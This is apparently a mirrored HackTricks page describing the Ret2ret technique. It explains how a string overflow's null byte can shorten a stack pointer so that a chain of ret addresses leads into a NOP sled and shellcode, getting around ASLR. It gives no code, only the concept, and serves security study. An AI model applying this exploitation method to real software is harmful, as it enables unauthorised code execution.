mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
3.3 KiB
3.3 KiB
Ret2ret
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
The main goal of this technique is to try to bypass ASLR by abusing an existing pointer in the stack.
Basically, stack overflows are usually caused by strings, and strings end with a null byte at the end in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained 0xbfffffdd, this overflow could transform it into 0xbfffff00 (note the last zeroed byte).
If that address points to our shellcode in the stack, it's possible to make the flow reach that address by adding addresses to the ret instruction util this one is reached.
Therefore the attack would be like this:
- NOP sled
- Shellcode
- Overwrite the stack from the EIP with addresses to
ret - 0x00 added by the string modifying an address from the stack making it point to the NOP sled
References
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.